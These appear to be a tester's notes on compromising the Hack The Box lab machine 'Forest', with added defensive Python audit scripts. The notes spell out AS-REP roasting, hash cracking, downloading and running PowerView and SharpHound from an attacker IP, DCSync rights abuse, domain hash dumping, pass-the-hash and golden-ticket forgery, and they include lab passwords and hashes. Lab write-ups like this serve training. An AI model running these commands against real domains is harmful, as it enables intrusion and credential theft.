Forest

Multitask nmap scan (the sleep delays the full-port scan so it runs in the background while other enumeration proceeds):

sleep 300 ; nmap -p- -v forest.htb -oN forest-nmap-al-port

Common ports: 135 / 445 = SMB, 389 = LDAP

Query the target's own DNS server (nslookup session):

nslookup
server forest.htb
127.0.0.1
forest.htb

LDAP

Locating the LDAP base DN of a host

Using nmap:

locate -r nse$ | grep ldap
nmap -p 389 --script ldap-rootdse -Pn forest.htb
nmap -p 389 --script ldap-search -Pn forest.htb

nse$ = matches anything ending in nse (the locate call lists the installed NSE scripts)

ldapsearch

ldapsearch -H ldap://forest.htb
ldapsearch -x -H ldap://forest.htb
ldapsearch -x -H ldap://forest.htb -s base namingcontexts
ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local" > htb/forest/ldap-anonymous.txt
ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local" 'objectClass=person' > ldapsearch-person.txt
cat ldapsearch-person.txt | grep 'dn: CN='
ldapsearch -x -H ldap://forest.htb -b "DC=htb,DC=local" 'objectClass=person' sAMAccountName | grep sAMAccountName | awk '{print $2}'

  • -h = host (older syntax; -H takes a full URI)
  • Note: without -x, ldapsearch defaults to SASL authentication (e.g. DIGEST-MD5)
  • -x = simple authentication / anonymous bind
  • -b = base DN, taken from the -s base namingcontexts query
  • 'objectClass=' = filter by object class, e.g. person, user

ldapdomaindump

ldapdomaindump -u 'emerald\pawn' -p 'WGMY2022!' 10.10.37.41

Password Crafting

Appending a year to the end of every password in a list

for i in $(cat base2-password); do echo $i;echo ${i}2019;echo ${i}2020;done

Appending symbols to every password in a list

for i in $(cat base3-password); do echo $i;echo "${i}!";echo "${i}@";echo "${i}#";done

Improving a password list with hashcat rules

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule

hashcat --force --stdout base3-password -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u | awk 'length($0) >8' 

  • --force = ignore hashcat's warnings (used here because there is no GPU)
  • --stdout = print the generated candidates instead of cracking
  • -r = rule file
  • best64.rule = common permutations
  • toggles1.rule = upper-case / lower-case toggles
  • awk 'length($0) >8' = keep only candidates with length > 8
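As an added defensive counterpart to the password-crafting commands above (not part of the original notes): a password policy check that undoes the same cheap mangling these rules produce (case toggles, leet substitutions, appended years and symbols) before comparing against a banned base-word list. The base words and the minimum length are constructed assumptions.

```python
import re

# Constructed banned base-word list, standing in for the base3-password file above.
BASE_WORDS = ["password", "forest", "welcome", "summer"]
MIN_LEN = 12  # assumed policy minimum

# Reverse the common leet substitutions that rule files like best64 apply.
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})

def normalize(candidate):
    """Strip the cheap mangling: leading/trailing digits and symbols (years,
    '!', '123'), then lower-case and undo leet substitutions in the core."""
    core = re.sub(r"[^A-Za-z]+$", "", candidate)   # trailing 2020, !, 123 ...
    core = re.sub(r"^[^A-Za-z]+", "", core)        # leading symbols
    return core.lower().translate(LEET)

def weak_password(candidate, base_words=BASE_WORDS, min_len=MIN_LEN):
    """Return a reason if the candidate is too short or is just a mangled
    base word; return None when it passes the check."""
    if len(candidate) < min_len:
        return "too short"
    core = normalize(candidate)
    for base in base_words:
        if base in core:
            return "mangled form of '%s'" % base
    return None

if __name__ == "__main__":
    for pw in ["P@ssw0rd2020!", "Forest2019", "W3lc0me!!2023", "correct-horse-battery"]:
        print(pw, "->", weak_password(pw))
```

Every candidate the best64/toggles pipeline above would emit from a banned base word is rejected by this check, which is why rule-based mangling alone does not satisfy a sane policy.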

impacket

locate impacket
cd /usr/share/doc/python3-impacket/examples
./GetNPUsers.py -dc-ip forest.htb -request 'htb.local/'
./GetNPUsers.py -dc-ip forest.htb -request 'htb.local/' -format hashcat 

Alternative (per user, without a password):

for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

GetNPUsers.py = AS-REP roasting (the pre-authentication counterpart of Kerberoasting)
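Added audit example (not part of the original notes) that serves both the ldapsearch section and this one: it parses ldapsearch-style LDIF output, the same data the grep/awk pipeline above extracts, and flags enabled accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set, i.e. exactly the accounts GetNPUsers.py would get an AS-REP for. The LDIF entries are constructed; the flag values are the documented userAccountControl bits.

```python
import base64
import re

# Constructed LDIF in ldapsearch's output format (not real Forest output).
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: person
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=Administrator,CN=Users,DC=htb,DC=local
objectClass: person
sAMAccountName: Administrator
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=htb,DC=local
objectClass: person
sAMAccountName: Guest
userAccountControl: 66082
"""

# userAccountControl bit flags (documented Microsoft values).
ACCOUNTDISABLE = 0x0002
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

def parse_ldif(text):
    """Split LDIF into entries (blank-line separated); unfolds continuation
    lines (leading space) and decodes 'attr:: <base64>' values."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in re.sub(r"\n ", "", block).splitlines():
            key, _, value = line.partition(":")
            if value.startswith(":"):                   # attr:: <base64>
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            entry[key.strip()] = value.strip()
        entries.append(entry)
    return entries

def asrep_roastable(entries):
    """Enabled accounts with Kerberos pre-authentication disabled."""
    found = []
    for e in entries:
        uac = int(e.get("userAccountControl", "0"))
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(e["sAMAccountName"])
    return found

if __name__ == "__main__":
    print("pre-auth disabled:", asrep_roastable(parse_ldif(SAMPLE_LDIF)))
```

Running this over a real `ldapsearch ... 'objectClass=person' sAMAccountName userAccountControl` export gives the list of accounts to fix before an attacker runs GetNPUsers.py.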

hashcat

hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less    (then type /krb5asrep inside less)
hashcat -m 18200 svc-alfresco-hash  /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule 

Alternative ways to log in

powerview emerald.wgmy/nur.ireene:p@ssw0rd@10.10.132.46  
python3 smbexec.py test.local/john:password123@10.10.10.1

Is the WinRM port (5985) open?

evil-winrm -u svc-alfresco -p s3rvice -i forest.htb

Command execution methods (impacket):

  • wmiexec executes commands via WMI
  • atexec executes commands by scheduling a task with the Windows Task Scheduler
  • smbexec executes commands by creating and running a service

bloodhound

neo4j console
bloodhound

To extract data for BloodHound:

bloodhound-python

bloodhound-python -u pwn -p 'WGMY2022!' -ns 10.10.19.239 -d emerald.wgmy -c all

sharphound

Download the SharpHound release:

wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.1/SharpHound-v1.1.1.zip

Load the PowerShell collector on the target and run it with the collected credentials:

iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1")
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice

Or run the compiled collector:

.\sharphound.exe -c all

In BloodHound, if you see Account Operators:

  • Built-in Windows group that can create accounts and add them to groups

Service Accounts

  • Created by Account Operators

Account Operators

  • Grants limited account-creation rights to a user

  • Except for the Administrators, Server Operators, Account Operators, Backup Operators or Print Operators groups


Create a new user using "Account Operators" because we are

net user jack Jack123 /add /domain

Check whether the group "Exchange Windows Permissions" exists and list its members

net group "Exchange Windows Permissions"

Adding the user to the group

net group "Exchange Windows Permissions" /add jack

Download PowerView onto the remote machine:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26:8000/PowerView.ps1')

Build a credential object for the new user and grant it DCSync rights on the domain (first form uses the current session, second form runs explicitly as jack):

$pass = ConvertTo-SecureString 'Jack123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\jack', $pass)
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jack -Rights DCSync
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jack -Rights DCSync

Dump the domain hashes with DCSync:

sudo ./secretsdump.py htb.local/jack:Jack123@forest.htb > /home/kali/htb/forest/hashdump

./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@forest.htb

evil-winrm -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i forest.htb

crackmapexec smb 10.10.10.161 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Print all hashes only

cat hashdump | grep ::: | awk -F: '{print $4}'

Print all users : hashes

cat hashdump | grep ::: | awk -F: '{print $1":"$4}'

--user tells hashcat the file has user:hash lines, so it strips the username field itself

hashcat -m 1000 forest-ntlm-hash --user /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

Show cracked results

hashcat -m 1000 forest-ntlm-hash --user --show   
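Added audit example (not part of the original notes) that parses the secretsdump-style hashdump the commands above produce and flags what a defender acts on first: accounts with an empty password, LM hashes still being stored, and the same NT hash shared by several accounts (password reuse). The dump lines are constructed and the hash values are placeholders; only the empty-password LM/NT hashes are real constants.

```python
import re
from collections import defaultdict

# Constructed secretsdump-style lines (placeholder hashes, not real Forest data).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
htb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Same fields the awk -F: pipeline above splits on: user:rid:lm:nt:::
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

def parse_dump(text):
    """Return one dict per hash line; banner and status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows

def audit(rows):
    """Flag empty passwords, stored LM hashes and NT-hash reuse.
    Machine accounts (trailing $) have random passwords and are skipped."""
    findings = {"empty_password": [], "lm_stored": [], "reuse": []}
    by_nt = defaultdict(list)
    for r in rows:
        if r["user"].endswith("$"):
            continue
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    findings["reuse"] = [users for users in by_nt.values() if len(users) > 1]
    return findings

if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE_DUMP)))
```

Reuse between a privileged account and a service account, as in the constructed sample, means cracking the weaker account's password with the hashcat command above also yields the privileged one.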

Crafting a Golden Ticket for a user that does not exist (NotExist)

sudo ./ticketer.py -nthash 819af826bb148e603acb0f33d17632f8  -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local NotExist

./psexec.py htb.local/NotExist@forest -k -no-pass
./wmiexec.py htb.local/NotExist@forest -k -no-pass

Either command logs in as administrator using the forged ticket.

kerbrute

References:

https://artkond.com/2016/12/18/pivoting-kerberos/

https://0xdf.gitlab.io/2020/03/21/htb-forest.html#shell-as-svc-alfresco

https://infra.newerasec.com/infrastructure-testing/privilege-esclation/windows/running-services
